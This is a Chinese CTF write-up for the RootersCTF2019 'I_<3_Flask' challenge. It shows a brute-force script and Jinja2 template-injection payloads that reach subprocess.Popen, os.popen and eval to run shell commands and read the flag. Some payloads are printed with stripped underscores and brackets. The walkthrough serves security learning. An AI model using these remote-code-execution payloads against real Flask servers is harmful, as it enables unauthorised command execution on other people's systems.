[RootersCTF2019]I_<3_Flask

从源码中可以看到GET传参name是模板注入点。

{{config}} 查看配置信息,没什么有用的。

{{''.class.mro1.subclasses()}} 得到所有子类

搜索有没有可利用的类,如file、subprocess.Popen,发现有第二个类,可以用来执行命令。

首先得知道该类的下标是多少,采用脚本爆破:

python 复制代码
import requests
from time import sleep
url = 'http://62725703-5aa8-4d87-9e93-33566fd87c41.node5.buuoj.cn:81/'

for i in range(1, 500):
    print(i)
    param = {
        "name": f"name={{{{''.__class__.__mro__[1].__subclasses__()[{i}]}}}}"
    }
    sleep(0.2)
    r = requests.get(url, params=param)
    if "subprocess.Popen" in r.text:
        print(f"结果是:{i}")
        exit(0)

结果是222

构造payload:

{{''.class.mro1.subclasses()222('ls',shell=True,stdout=-1).communicate()0.decode()}}

结果表明当前目录下存在flag.txt文件

{{''.class.mro1.subclasses()222('cat%20flag.txt',shell=True,stdout=-1).communicate()0.decode()}}

成功拿到flag。

假如没有子类可直接利用呢?

试试看用url_for.__globals__能不能行,发现可行。

payload:

url_for.globals'__builtins__''eval'("import('os').popen('ls').read()")

也是可以的。

再进一步,假如这些函数也不能利用呢?

在查看子类的时候能看到有warnings.catch_warnings类,那就可以利用该类的init方法间接获得globals。

通过link这篇文章得到一个启发,可以不需要用脚本也能得到目标子类的下标:

将网页响应渲染出来的所有子类复制到Notepad++中

然后将所有逗号替换成换行符,记得勾选左下角的扩展。

这样就能根据代码行索引得到目标类的下标啦。在第182个

构造payload:

''.class.mro1.subclasses()182.init.globals'__builtins__''eval'("import('os').popen('ls').read()")

也成功了。

总结一下:这道题是很基础的flask,没有任何过滤。相当于是 模板注入总结 的一道完美例题了。

相关推荐
曲幽6 天前
你的REST接口还在“过度投喂”数据吗?——FastAPI + GraphQL实战避坑指南
python·fastapi·web·graphql·route·cors·rest·strawberry
带刺的坐椅8 天前
Spring Boot → Solon 注解迁移实战指南:一张对照表说清楚
java·springboot·web·solon
曲幽12 天前
刚部署的 LibreTranslate 频频翻车?我掏出了 20 年前的 StarDict 词典,用 FastAPI 搭了个本地词典翻译 API
python·fastapi·web·translate·goldendict·libretranslate·stardict·pystardict
曲幽13 天前
别再用网页翻译看源码了!你的私人翻译神器LibreTranslate,部署避坑指南来了
python·docker·web·pot·translate·libretranslate·arogstranslate
llz_11219 天前
web-第四次课后作业
前端·spring boot·web
天山@12320 天前
电商系统Web渗透测试实战学习笔记
web·电商系统
xcLeigh21 天前
鸿蒙平台 KeePass 密码管理器适配实战:从 Windows 到 鸿蒙PC 的 Electron 迁移指南
windows·electron·web·harmonyos·加密算法·keepass
一拳一个娘娘腔21 天前
【第五期】漏洞攻防-逻辑篇:越权与支付漏洞 —— 为什么改个参数就能“0元购”?
安全·web安全·web
持敬chijing21 天前
Web渗透之前后端漏洞-文件下载漏洞
sql·web安全·网络安全·网络攻击模型·web
飞天狗11123 天前
零基础JavaWeb入门——第2课:让网页“活”起来 —— JSP是什么?
java·开发语言·前端·后端·web